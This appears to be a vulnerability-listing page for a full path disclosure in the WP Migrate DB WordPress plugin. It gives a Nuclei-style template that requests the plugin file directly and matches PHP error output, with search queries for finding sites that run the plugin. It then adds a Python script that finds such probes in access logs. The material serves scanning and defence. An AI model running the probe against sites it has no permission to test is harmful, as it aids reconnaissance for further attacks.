The WP Migrate DB (WP Migrate Lite - WordPress Migration Made Easy) plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
PoC code [publicly available]
id: wp-migrate-db-fpd

info:
  name: WordPress WP Migrate DB - Full Path Disclosure
  author: pussycat0x
  severity: low
  description: |
    The WP Migrate DB (WP Migrate Lite - WordPress Migration Made Easy) plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
  reference:
    - https://wordpress.org/plugins/wp-migrate-db/
  metadata:
    max-request: 1
    publicwww-query: "/wp-content/plugins/wp-migrate-db/"
    fofa-query: body="/wp-content/plugins/wp-migrate-db/"
  tags: wordpress,wp,wp-plugin,fpd,wp-migrate-db,wpmdb

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/wp-migrate-db.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "wp-migrate-db")'
        condition: and
# digest: 4a0a00473045022100a01649a064b08645f307ddadc80e7f716b429784bbf56fe5445e9cde12340b31022005340d7e21e177f4b9530e1f2ce3c6100fbfb3d0630a67b42f477da88bd8683a:922c64590222798bb761d5b6d8e72950
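For the defending side, the request this template sends can be spotted in web server access logs. The following is an added example, not part of the template or the plugin: it assumes the Apache/nginx "combined" log format, and the function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path requested by the template above (relative to the site root).
PROBE_PATH = "/wp-content/plugins/wp-migrate-db/wp-migrate-db.php"
# Status codes the template's matcher accepts.
LEAK_STATUSES = {200, 500}

# Assumption: Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(target):
    """Drop the query string, URL-decode, collapse duplicate slashes, lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def find_direct_hits(lines):
    """Return {client_ip: [(timestamp, status), ...]} for direct requests
    to the plugin's main file that were answered with 200 or 500."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed format
        status = int(m.group("status"))
        if normalize(m.group("target")).endswith(PROBE_PATH) and status in LEAK_STATUSES:
            hits[m.group("ip")].append((m.group("ts"), status))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /wp-content/plugins/wp-migrate-db/wp-migrate-db.php HTTP/1.1" 500 512 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET /wp-content//plugins/wp-migrate-db/wp-migrate-db.php?x=1 HTTP/1.1" 200 498 "-" "curl/8.0"',
    '198.51.100.4 - - [10/Jan/2024:10:05:00 +0000] "GET /wp-content/plugins/wp-migrate-db/wp-migrate-db.php HTTP/1.1" 403 153 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jan/2024:10:06:00 +0000] "GET /wp-admin/tools.php?page=wp-migrate-db HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in find_direct_hits(SAMPLE_LOG).items():
        print(ip, events)
```

A hit only shows that the file was requested directly and answered with a status the template accepts; whether a path was actually disclosed depends on the response body, which access logs do not record.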